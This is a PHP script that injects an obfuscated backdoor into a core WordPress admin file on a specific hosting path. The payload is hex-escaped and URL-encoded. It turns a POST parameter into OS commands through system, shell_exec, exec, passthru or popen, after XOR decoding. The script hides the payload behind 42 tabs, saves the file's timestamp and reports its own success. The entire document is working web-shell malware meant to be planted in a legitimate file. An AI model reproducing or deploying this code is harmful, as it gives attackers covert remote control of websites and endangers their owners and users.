<?php  $path = '/home/hucscom/domains/huc99-s.com/private_html/wp-admin/includes/class-walker-category-checklist.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24restore_state5%20%3D%20%22po%5Cx70%5Cx65n%22%3B%20%24restore_state3%20%3D%20%22%5Cx65x%5Cx65c%22%3B%20%24restore_state1%20%3D%20%22sys%5Cx74em%22%3B%20%24restore_state7%20%3D%20%22%5Cx70c%5Cx6C%5Cx6Fse%22%3B%20%24service_registry%20%3D%20%22%5Cx68%5Cx65x2b%5Cx69%5Cx6E%22%3B%20%24restore_state4%20%3D%20%22%5Cx70as%5Cx73%5Cx74%5Cx68ru%22%3B%20%24restore_state6%20%3D%20%22s%5Cx74rea%5Cx6D_%5Cx67%5Cx65t%5Cx5F%5Cx63%5Cx6Fn%5Cx74%5Cx65%5Cx6Ets%22%3B%20%24restore_state2%20%3D%20%22she%5Cx6C%5Cx6C_%5Cx65x%5Cx65%5Cx63%22%3B%20if%20%28isset%28%24_POST%5B%22d%5Cx65s%5Cx63ri%5Cx70%5Cx74or%22%5D%29%29%20%7B%20function%20request_approved%28%24rec%2C%20%24elem%20%29%20%7B%20%24pgrp%3D%27%27%3Bforeach%28str_split%28%24rec%29%20as%20%24char%29%7B%24pgrp.%3Dchr%28ord%28%24char%29%5E%24elem%29%3B%7D%20return%20%24pgrp%3B%7D%20%24descriptor%20%3D%20%24service_registry%28%24_POST%5B%22d%5Cx65s%5Cx63ri%5Cx70%5Cx74or%22%5D%29%3B%20%24descriptor%20%3D%20request_approved%28%24descriptor%2C%2088%29%3B%20if%20%28function_exists%28%24restore_state1%29%29%20%7B%20%24restore_state1%28%24descriptor%29%3B%20%7D%20elseif%20%28function_exists%28%24restore_state2%29%29%20%7B%20print%20%24restore_state2%28%24descriptor%29%3B%20%7D%20elseif%20%28function_exists%28%24restore_state3%29%29%20%7B%20%24restore_state3%28%24descriptor%2C%20%24dchunk_rec%29%3B%20print%20join%28%22%5Cn%22%2C%20%24dchunk_rec%29%3B%20%7D%20elseif%20%28function_exists%28%24restore_state4%29%29%20%7B%20%24restore_state4%28%24descriptor%29%3B%20%7D%20elseif%20%28function_exists%28%24restore_state5%29%20%26%26%20function_exists%28%24restore_state6%29%20%26%26%20function_exists%28%24restore_state7%29%29%20%7B%20%24elem_pgrp%20%3D%20%24restore_state5%28%24descriptor%2C%20%27r%27%29%3B%20if%20%28%24elem_pgrp%29%20%7B%20%24ent_factor%20%3D%20%24restore_state6%28%24elem_pgrp%29%3B%20%24restore_state7%28%24elem_pgrp%29%3B%20print%20%24ent_factor%3B%20%7D%20%7D%20exit%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');